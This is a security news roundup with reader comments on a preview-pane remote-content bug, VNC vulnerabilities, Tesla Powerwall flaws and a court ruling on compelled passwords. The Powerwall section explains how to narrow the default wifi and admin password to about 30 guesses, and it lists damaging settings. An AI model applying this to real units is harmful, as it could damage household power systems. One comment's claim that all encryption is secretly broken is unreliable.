Malware embedded in office documents has been a popular attack for years. Many of those attacks have been fixed, and essentially all the current attacks are unworkable when a document is opened in protected view. There are ways around this, like putting a notice at the top of a document, requesting that the user turn off protected view. [Curtis Brazzell] has been researching phishing, and how attacks can work around mitigations like protected view. He noticed that one of his booby-trapped documents phoned home before it was opened. How exactly? The preview pane.
The Windows Explorer interface has a built-in preview pane, and it helpfully supports Microsoft Office formats. The problem is that the preview isn’t generated using protected view, at least when previewing Word documents. Generating the preview is enough to trigger loading of remote content, and could feasibly be used to trigger other vulnerabilities. [Curtis] notified Microsoft about the issue, and the response was slightly disappointing. His discovery is officially considered a bug, but not a vulnerability.
Researchers at Kaspersky took a hard look at several VNC implementations, and uncovered a total of 37 CVEs so far. It seems that several VNC projects share a rather old code-base, and it contains a plethora of potential bugs. VNC should be treated similarly to RDP — don’t expose it to the internet, and don’t connect to unknown servers. The protocol wasn’t written with security in mind, and none of the implementations have been sufficiently security hardened.
Examples of flaws include: Checking that a message doesn’t overflow the buffer after having copied it into said buffer. Another code snippet reads a variable length message into a fixed length buffer without any length checks. That particular function was originally written at AT&T labs back in the late 90s, and has been copied into multiple projects since then.
There is a potential downside to open source that is highlighted here. Open source allows poorly written code to spread. This isn’t a knock against open source, but rather a warning to the reader. Just because code or a project uses an OSS license doesn’t mean it’s secure or high quality code. There are more vulnerabilities still in the process of being fixed, so watch out for the rest of this story.
And since we’re talking about security fails, Tesla’s Powerwall contained a few of them. It’s unclear how many of these have been fixed with firmware updates, but the researchers at Hacker’s Choice just released the results of their testing.
The highlight of of the work is the hard-coded wifi password, set to the unit’s serial number. The problem is that the serial number is a known format:
ST<YY><L>0001<XYZ>. “YY” is the year of manufacture. So far, that’s only since 2015, meaning there’s only 5 possible options. “L” is the revision, with only 6 seen in the wild so far. The last 7 digits appear to be a linearly incrementing number, with only numbers between 1000 and 2000 being seen. The real kicker is that the wifi network name appears to contain the last 3 digits of the serial number, giving that information away for free. For those keeping track at home, that means that an attacker trying to connect to a Powerwall’s wifi network has only 30 possible passwords to try, given this best case scenario.
How bad could it be, for an attacker to gain access to a Powerwall’s network? There is a web-based management interface that uses the same password as the wifi. This interface has all sorts of useful functions, like inverting the power sensor logic. This option probably exists to work around a hapless electrician that installed the sensor clamp backwards, but different combinations of inversion lead to various interesting results, like charging the grid when the battery should be charging, or pulling power instead. Another fun option is to change the power output to the home to another country’s standard. Doubling the voltage or changing the power frequency could be disastrous.
While this research was just published, the firmware tested appears to be from late 2017, with multiple updates released since then. Tesla hasn’t published details about security fixes in their firmware releases, so it’s hard to know how many of the problems presented here have been fixed.
Passwords, Freedom, and Self-incrimination
A legal fight has been slowly brewing in the US over the last few years. The central question is this: Does the Constitutionally guaranteed right against self-incrimination apply to passwords? Courts have been testing this issue for years, but so far a case has not come before the US Supreme Court. Prior cases have applied something known as the “Foregone Conclusion Exception”. This essentially means that with a warrant, police can compel an individual to turn over documentation that is known to exist. The Pennsylvania Supreme Court weighed in on the issue recently, and found that the act of giving a password is inherently testimonial, and therefore protected under the 5th amendment.
No person…shall be compelled in any criminal case to be a witness against himself….
This is yet another case of the difficulty of applying laws and rulings from before the computer revolution. If the password was instead a combination to a safe, it would be easy enough to open that safe through various means, even without the cooperation of the individual. Modern encryption is an entirely different realm, where decryption is impossible without the password. This latest ruling rejects the notion that the forgone conclusion exception can apply to a password. This issue will likely be decided at the US Supreme Court eventually.
We’re running this weekend because of Thanksgiving, but keep your eyes peeled Friday mornings for This Week in Security, and we’ll keep you up to date with these stories and more.
29 thoughts on “This Week In Security:Malicious Previews, VNC Vulnerabilities, Powerwall, And The 5th Amendment”
There is no “YY” or “L” in “ST0001″… Does anybody really review those articles before posting?
Oy, thanks for pointing that out. Adding text with brackets is difficult, because the WordPress editor sees them as malformed html tags and removes them.
Nope. Not a single person. It’s incredible.
Malware. Waiting for the time when it will all start with healthware.
“Just because code or a project uses an OSS license doesn’t mean it’s secure or hi quality code.”
It also doesn’t mean that project has ever been security audited by someone that knows what they’re doing. Open source is not inherently more secure than closed source in practice, only in theory, and that theory comes with a lot caveats. One of them is that it requires enough eyes looking at the source code to catch problems like this. Linux, Python, GCC, etc all have plenty of eyes, but that niche library for a specific microcontroler probably doesn’t. Obviously that library didn’t either despite being widely used.
Yep, that’s exactly what I was getting at.
The other side of that coin is that closed source software has examples that are just as ugly, but we don’t get to audit those.
Agreed. It’s a lot harder, and the skill bar a lot higher, to reverse engineer proprietary products.
The question of auditing is yet another red herring. Most users can’t or won’t, because it costs unreasonable amounts of time and money. There’s no advantage in being able to look inside the box – since you don’t understand what’s in there anyhow. So what if some guy somewhere spots a security flaw in the software you’re using – what are you going to do about it? What -can- you do about it?
Absolutely nothing. Just wait and hope it gets patched.
With Open Source, it’s easier to find exploitable flaws – for both the good guys and the bad guys. The question is simply whether the good guys are motivated and competent enough to find the security flaws first.
Did you read TFA? Researchers at Kaspersky audited the code, because it was open source, and found a boatload of bugs that are getting fixed.
You miss the point. Most software is never audited. You’re still relying on third parties to do it for you, if they’re interested enough.
Or, to put it otherwise, you’re fundamentally relying on the original supplier/author of the software to do a good job. If they haven’t, then you don’t want everyone else seeing the code, because then you’re in a race over who finds the holes first.
And that’s a bad gamble, because the people who are helping you have less incentive and reward from doing so, than the people who are trying to harm you, so obviously there’s more people trying to break in than trying to fix the holes. That’s why there’s no real advantage for security in open source software.
@Luke: Citation needed.
Why are the police looking for documentation? Did they buy black market software?
Or are they looking for documents?
WHY WHY WHY does the powerwall allow changing the output voltage and direction to software? just make them dip switches in the unit. Still allows for the hapless tech, but never allows a 3rd party (or homeowner) to remotely change this. It will never be changed after install. Just use dip switches.
Likely so it can be fixed by the remote tech that finalizes the installation. I would assume Tesla has it worked out so the Powerwalls can be installed without a Tesla employee ever showing up on site.
Presumably they know where the product is being installed, because they know who they sold it to, so can’t they just flip the switch at the production line?
When would there ever be need to switch the voltage standard?
as long as the DIP switches aren’t near any of the high voltage bits, just ask the guy on site (there will be one) to change the position for you. Someone has to bolt the thing to the wall, and connect the cables. If they can do that then they can also call into Tesla and flip a dip switch. I’m probably broken from my industrial background though. All the power wall really is a giant VFD plus a couple of extras fro the battery charging circuit.
Seems like every 5 years things build up to everyone saying “The ONLY way to do remote stuff is VNC…” then it has a security scare and I think, shame, maybe I’ll wait until it’s mature, 4 years pass, everyone saying it’s the only way to get crap done again, think I ought to look into it again and before I get my ass in gear, damn, the same eleventy security holes it had before, gah… in the three tween years, nobody seems to have a bad thing to say about it.
Use VNC over SSH tunneling or a VPN. Don’t leave an open VNC service exposed to the internet.
yep vnc over SSH tunnel. on the very rare occasion I need access to the desktop at work when I’m not there. most good vnc clients support it too so it’s very convenient once set up.
There used to be a web site featuring a large number of publicly accessible VNC servers on the Internet. Can’t remember/find the URL now, but when I looked at it, some of the things exposed were somewhat important.
vinagre tunnels VNC over SSH, which seems a very reasonable solution.
>”Modern encryption is an entirely different realm”
No it’s not. It’s perfectly analogous to someone hiding evidence and refusing to say where it is. If the person went through enough trouble to cover their tracks, you’ll never find it without their co-operation.
Modern encryption is an entirely different realm than opening a safe. We’ve even covered brute-force safe cracking: https://hackaday.com/2017/03/27/safe-cracking-is-nates-latest-rd-project/ They opened it in less than an hour, btw.
Yeah, but we don’t have to compared to a safe.
This is not a “case of the difficulty of applying laws and rulings from before the computer revolution”. Our legal systems have had to deal with this exact issue since ancient history – and it is exactly because of it that the rule of not having to incriminate yourself was made.
Otherwise you’d run up into kafka trials where you’d be thrown to prison for not admitting information that would land you in prison anyways. You couldn’t win, because the accuser can simply make it up and condemn you for your refusal to admit it.
Likewise here – this is not a case where the old legal system is unable to deal with new methods of hiding evidence. It’s working exactly as it should. Again, you could be accused of withholding a key to an encrypted file that holds incriminating information about yourself. If you deny that you know the key – because you have really don’t – they could accuse you of lying to the court and obstructing justice etc.
Good point. Kicking around on my old drives is probably encrypted first drafts of a contract or two, that I didn’t even bother keeping the password too because it was rapidly superseded. But you’re doing disk housekeeping and don’t immediately recall what this file is, so you leave it in case you remember later. Files of random noise from the entropy pool you created to mess around with something, looks like highly encrypted stuff to mister plod. Fragments of blocks undeleted forensically, from when you were messing around with dogecoin, looks like secret squirrel shit kiddo. Even highly encrypted steganographic content that someone put in a random image online which you thought was a stock image you could use for something, or is sitting in your browser cache.
I don’t believe for a second that encrypted data in court cases is not decryptable without a password. I believe it is quite easy using very secret methods which are reserved only for very high priority cases. Revealing the method burns it therefore it remains secret until a sufficiently high priority case presents itself – Think: National security, protecting the baldwins, subverting freedom as needed to establish global power and one world government. I believe this era will be looked back upon as the era when every single internet-connected device was compromised, since the beginning – And no one knew it until it didn’t matter anymore. The question is, what does that “didn’t matter any more” future look like? I fear that it is something like a cross between Half Life 2 and The Walking Dead. Better build up a tolerance for those shock sticks ahead of time so we can withstand the beatings all the way to the soup line, don’t want to be late, the early bird gets the warmest soup…
Obviously somebody knows it, otherwise it couldn’t be used. Quite many people have to know about it, because otherwise when such high profile cases present themselves, none of the people involved would know that the method even exists.
Which then goes back to people being bad at keeping secrets.
The basic argument is that conspiracies can be revealed by simple accident, and that even if the probability of accident is something small like 4 in a million, the odds go against the more people you involve in your conspiracy. For example, if a thousand people are involved, the odds of accidentally blurting it out drop to 1:250
The point where the conspiracy is most likely to be revealed is when you have to pass it to the next generation. You take a huge gamble in introducing new people into the system,
IMO China is trying to compromise at the hardware end, Russia at the software end, and the US likes it’s little black boxes in data centers. Not that there isn’t some mix and match there.
But anyway, it may burn you for medium priority cases if it’s something easy and they can use parallel construction to conceal the original source.
Some stuff is gonna be like ultra, because foreign governments use it or similar systems and they don’t want the statistical analysis to show up unlikely peaks in conviction rates, giving it away to anyone willing to do the number crunching, i.e. the other guys.
Please be kind and respectful to help make the comments section excellent. (Comment Policy)